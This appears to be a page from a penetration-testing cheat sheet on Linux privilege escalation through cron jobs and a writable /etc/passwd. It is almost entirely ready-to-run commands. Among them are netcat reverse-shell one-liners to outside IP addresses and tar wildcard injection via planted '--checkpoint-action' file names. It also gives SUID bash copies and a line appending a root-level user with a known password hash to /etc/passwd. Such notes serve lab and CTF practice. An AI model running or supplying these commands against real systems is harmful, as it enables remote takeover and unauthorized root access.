Insecure File Permissions

Abusing Cron Jobs

To check

ls -lah /etc/cron*

crontab -l

cat /etc/corntab

grep "CRON" /var/log/syslog

also check for other log files..

To Abuse

cd /var/www/html
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.8.3.38 4443 >/tmp/f" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"

cat /etc/crontab
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=sh\ runme.sh


#wild card
echo "mkfifo /tmp/lhennp; nc 10.17.10.67 8888 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1

Writetable passwd

openssl passwd getsystem

echo "getsystem:n0ziXTZ5ZZOn6:0:0:root:/root:/bin/bash" >> /etc/passwd

su getsystem

getsystem

id
PreviousService/Network FootprintingNextInsecure System Components

Last updated